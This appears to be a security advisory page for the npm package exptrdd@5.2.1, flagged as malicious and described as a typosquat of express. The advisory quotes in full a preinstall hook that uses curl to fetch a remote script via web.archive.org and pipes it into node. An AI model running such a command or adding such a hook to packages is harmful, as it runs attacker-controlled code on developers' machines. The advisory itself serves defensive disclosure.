Logo
npm

exptrdd@5.2.1

Vulnerability report · Last retrieved from osv.dev September 29, 2026 at 3:09 PM UTC

Malicious

OSV ID

MAL-2026-17245

Ecosystem

npm

Summary

package.json declares a preinstall lifecycle that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching an unpinned script from a mutable branch and piping it directly into node on every npm install. The fetched code runs with the installer's privileges and can perform arbitrary actions on the host. The package identity is a typosquat of express: name is exptrdd while the description, keywords, author, and repository fields are copied verbatim from expressjs/express, so developers who mistype express install the dropper. The remote source (codeberg branch, proxied through web.archive.org) is attacker-controlled and mutable, so the executed payload can change at any time without a package republish.

Source: amazon-inspector (6ba0b22d41f4edf82552b79417b6660bc1aaf311e4ec597b31674f0b6fdd5314)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.